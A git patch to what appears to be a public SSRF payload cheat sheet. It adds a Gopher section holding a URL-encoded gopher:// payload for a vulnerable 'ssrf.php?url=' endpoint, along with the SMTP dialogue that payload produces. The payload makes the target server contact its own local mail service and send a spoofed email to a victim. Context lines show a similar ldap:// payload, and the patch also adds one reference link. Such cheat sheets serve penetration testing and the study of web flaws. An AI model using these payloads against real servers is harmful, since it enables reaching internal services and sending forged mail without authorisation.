From e7cb8a2ce19f6a7a1b51b258d3d26e0f7d876af6 Mon Sep 17 00:00:00 2001
From: Swissky <swissky@crashlab>
Date: Tue, 19 Sep 2017 20:35:18 +0200
Subject: [PATCH] SSRF - Gopher Protocol

---
 SSRF injection/README.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 2af9a6c..2ae9c1f 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -94,6 +94,26 @@ Ldap://
 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 ```
 
+Gopher://
+```
+ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
+
+will make a request like
+HELO localhost
+MAIL FROM:<hacker@site.com>
+RCPT TO:<victim@site.com>
+DATA
+From: [Hacker] <hacker@site.com>
+To: <victime@site.com>
+Date: Tue, 15 Sep 2017 17:20:26 -0400
+Subject: Ah Ah AH
+
+You didn't say the magic word !
+
+
+.
+QUIT
+```
 
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
@@ -101,3 +121,4 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
 * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
 * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
+* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)